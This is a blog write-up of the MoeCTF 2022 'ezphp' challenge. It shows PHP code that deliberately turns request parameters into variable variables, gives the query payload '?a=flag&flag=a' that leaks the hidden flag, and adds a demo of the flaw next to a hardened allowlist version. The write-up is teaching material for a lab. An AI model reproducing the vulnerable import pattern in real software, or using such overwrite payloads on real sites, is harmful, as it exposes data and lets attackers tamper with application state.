
[MoeCTF 2022]ezphp

0x00

Knowledge points used

  1. Variable overwrite (PHP variable variables, `$$key`)

0x01

Source code analysis

```php
<?php

highlight_file('source.txt');
echo "<br><br>";

$flag = 'xxxxxxxx';
$giveme = 'can can need flag!';
$getout = 'No! flag.Try again. Come on!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($giveme);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($getout);
}

// every POST parameter becomes a variable with the same name as the key
foreach ($_POST as $key => $value) {
    $$key = $value;
}

// every GET parameter becomes a variable holding the value of the variable named by its value
foreach ($_GET as $key => $value) {
    $$key = $$value;
}

echo 'the flag is : ' . $flag;

?>
```

The displayed source shows the value of `flag` as `xxxx`.

But that is not really the case; the real value is only hidden from the displayed source.

So all we need is to make the script print the correct `$flag`.

0x02

So we construct the following payload:

```
?a=flag&flag=a
```

The GET loop runs `$$key = $$value` for each parameter in order: first `$a <- $flag`, then `$flag <- $a`.

This gives us `$flag`.
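To make the chain visible without touching the real symbol table, here is an added example (not the challenge's own code) that replays the two import loops over an explicit array named `$vars`, runs the payload above through them, and places a hardened import beside them. The functions `vulnerable_import`, `safe_import` and the allowlist are assumptions for this illustration; the inputs are constructed to mirror the challenge.

```php
<?php
// Added example, not part of the challenge source.
// vulnerable_import() replays the challenge's loops over $vars instead of the
// real symbol table, so the effect on every variable can be traced.
function vulnerable_import(array $vars, array $get, array $post): array
{
    // foreach ($_POST as $key => $value) { $$key = $value; }
    foreach ($post as $key => $value) {
        $vars[$key] = $value;            // any name, including 'flag', is writable
    }
    // foreach ($_GET as $key => $value) { $$key = $$value; }
    foreach ($get as $key => $value) {
        // the *value* names another variable; its content is copied (null if undefined)
        $vars[$key] = $vars[$value] ?? null;
    }
    return $vars;
}

// Hardened form (assumed design): parameters are read by name from an
// allowlist into a dedicated array. No variable variables are used, so
// application state such as $flag can never be renamed, aliased or overwritten.
function safe_import(array $get, array $post, array $allowed): array
{
    $params = [];
    foreach ($allowed as $name) {
        if (isset($post[$name])) {
            $params[$name] = (string) $post[$name];
        } elseif (isset($get[$name])) {
            $params[$name] = (string) $get[$name];
        }
    }
    return $params;
}

// Constructed state: the server holds the real flag in $flag.
$state = ['flag' => 'flag{constructed-sample}'];

// 1) The writeup's payload ?a=flag&flag=a
$after = vulnerable_import($state, ['a' => 'flag', 'flag' => 'a'], []);
// iteration 1: key 'a',    value 'flag' -> $a    = $flag
// iteration 2: key 'flag', value 'a'    -> $flag = $a   (still the real flag)
echo "chained GET : flag = {$after['flag']}\n";

// 2) A naive ?flag=x passes both checks but rebinds $flag to the undefined $x
$after = vulnerable_import($state, ['flag' => 'x'], []);
echo "plain GET   : flag = " . var_export($after['flag'], true) . "\n";   // NULL

// 3) A POST parameter overwrites $flag outright
$after = vulnerable_import($state, [], ['flag' => 'overwritten']);
echo "POST        : flag = {$after['flag']}\n";

// 4) The hardened import: user input lands in $params, $state is untouched
$params = safe_import(['a' => 'flag', 'flag' => 'a'], [], ['a']);
echo "safe_import : params = " . json_encode($params) . ", flag = {$state['flag']}\n";
```

Case 2 is why the chain is needed at all: the second loop always rebinds `$flag` to whatever variable the parameter names, so `$flag` survives only if that variable already holds the flag. The hardened version removes the whole class of bug by never turning request keys or values into variable names.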



Source: https://tsy244.github.io/2024/05/02/CTF刷题记录/WEB/php/
Author: August Rosenberg
Posted on: May 2, 2024